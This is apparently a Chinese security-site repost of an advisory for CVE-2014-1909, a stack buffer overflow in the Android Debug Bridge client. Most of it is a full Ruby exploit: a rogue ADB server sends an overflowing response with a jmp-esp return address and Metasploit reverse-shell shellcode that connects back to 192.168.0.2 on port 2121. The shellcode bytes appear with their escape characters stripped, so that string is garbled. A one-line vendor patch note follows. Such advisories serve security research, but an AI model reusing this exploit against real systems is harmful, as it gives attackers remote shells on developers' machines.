Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / Android SDK 平台工具签名错误栈缓冲区溢出漏洞

发布日期:2014-02-04
更新日期:2014-02-15受影响系统:
Android SDK
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 65403
CVE(CAN) ID: CVE-2014-1909Android SDK Platform Tool是Android设备的开发软件包。Android SDK Tools的Android Debug Bridge存在栈缓冲区溢出漏洞,攻击者可利用此漏洞在受影响应用上下文中执行任意代码。<*来源:Joshua J. Drake
  *>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!#!/usr/bin/env ruby
# -*- coding: binary -*-require "socket"
require "uri"puts "[*] Exploit for ADB client stack buffer overflow -jduck"# linux/x86/shell_reverse_tcp - 90 bytes
# http://www.metasploit.com
# VERBOSE=false, LHOST=192.168.0.2, LPORT=2121,
# ReverseConnectRetries=5, ReverseAllowProxy=false,
# PrependFork=true, PrependSetresuid=false,
# PrependSetreuid=false, PrependSetuid=false,
# PrependSetresgid=false, PrependSetregid=false,
# PrependSetgid=false, PrependChrootBreak=false,
# AppendExit=true, InitialAutoRunScript=, AutoRunScript=
payload =
  "x6ax02x58xcdx80x85xc0x74x06x31xc0xb0x01xcd" +
  "x80x31xdbxf7xe3x53x43x53x6ax02x89xe1xb0x66" +
  "xcdx80x93x59xb0x3fxcdx80x49x79xf9x68xc0xa8" +
  "x00x02x68x02x00x08x49x89xe1xb0x66x50x51x53" +
  "xb3x03x89xe1xcdx80x52x68x2fx2fx73x68x68x2f" +
  "x62x69x6ex89xe3x52x53x89xe1xb0x0bxcdx80x31" +
  "xdbx6ax01x58xcdx80"def read_request(cli)
  len = cli.recv(4)
  len = len.to_i(16)
  puts "[*] request length: #{len}"  buf = cli.recv(len)
  puts "[*] request: #{buf.inspect}"
  buf
endsrv = TCPServer.new 5037
loop {
  puts "[*] Waiting for client..."
  cli = srv.accept
  puts "[*] Accepted client"
   
  req = read_request(cli)
  if req != "host:version"
    puts "[-] incorrect request!"
    next
  end  res = "OKAY"
  res << "-fff"
  res << ("A" * 112) # padding  # popped registers
  res << [
    0xc0c00004, # ebx
    0xc0c00008, # esi
    0xc0c0000c, # edi
    0xc0c00010, # ebp
    #0x0810efd3, # eip - int 3 / ret
    0x812a14b, # eip - jmp esp
  ].pack("V*")  res << payload  puts "[*] Sending response (0x%x bytes)" % res.length
  cli.write(res)
  cli.close
}
srv.close建议:
--------------------------------------------------------------------------------
厂商补丁:Android
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:http://www.openhandsetalliance.com/android_overview.htmlIE10 0day 漏洞被利用获取军事情报Cisco Unified Communications Manager 任意文件泄露漏洞相关资讯      Android SDK Platform Tool  本文评论 查看全部评论 (0)
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用您的评论
  • 参与本评论